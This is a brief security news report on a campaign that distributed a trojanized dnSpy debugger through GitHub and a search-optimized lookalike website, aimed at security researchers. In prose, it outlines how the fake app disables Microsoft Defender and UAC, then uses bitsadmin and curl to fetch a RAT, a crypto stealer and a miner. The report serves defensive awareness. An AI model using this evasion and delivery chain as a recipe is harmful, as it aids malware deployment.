A Malicious Version of the dnSpy App is Being Used to Target Security Experts

In a current complex and advanced malware initiative, hackers were discovered to be distributing a malicious version of the dnSpy app to cybersecurity experts. The malevolent edition of the dnSpy app is a .NET app that malicious hackers use to install the following items on their victims’ compromised systems:-

• Install cryptocurrency stealers 
• Install Remote Access Trojan (RAT)
• Install miners 

The dnSpy is a debugger that is mostly used by developers and researchers to do the following:

• Debug .NET programs
• Modify .NET programs
• Decompile .NET programs

Malicious dnSpy 

The malicious hackers behind the malware dnSpy app have generated a GitHub archive where they have designed a malicious version of dnSpy that delivers malware such as:

• To steal cryptocurrency 
• The Quasar Remote Access Trojan
• A minor 
• Unknown payloads 

Malicious dnSpy’s distribution 

The attackers have created a specially crafted website, “dnSpy[.]net,” with an elegant design to make it look legit and professional to promote the malware. Furthermore, they used SEO techniques and relative positions to optimize their malicious website and rank it on all major search engine’s first page, including:

• Google 
• Yahoo 
• Bing 
• Yandex 
• Ask.com 
• AOL

When the malicious dnSpy app is launched, it runs a set of commands before performing the following actions with elevated permissions:-

• Disable Microsoft defender 
• Disable user account control
• Uses bitsadmin.exe to download curl.exe
• Curl.exe and bitsadmin.exe are used to download and launch various payloads to the C:\trash folder.

Furthermore, while this malicious campaign is offline, developers should always look for malicious replicas. Because such attacks are not fresh, they become increasingly lucrative and advanced for attackers, and they all seek to access personal data and gain access to their victims’ compromised networks.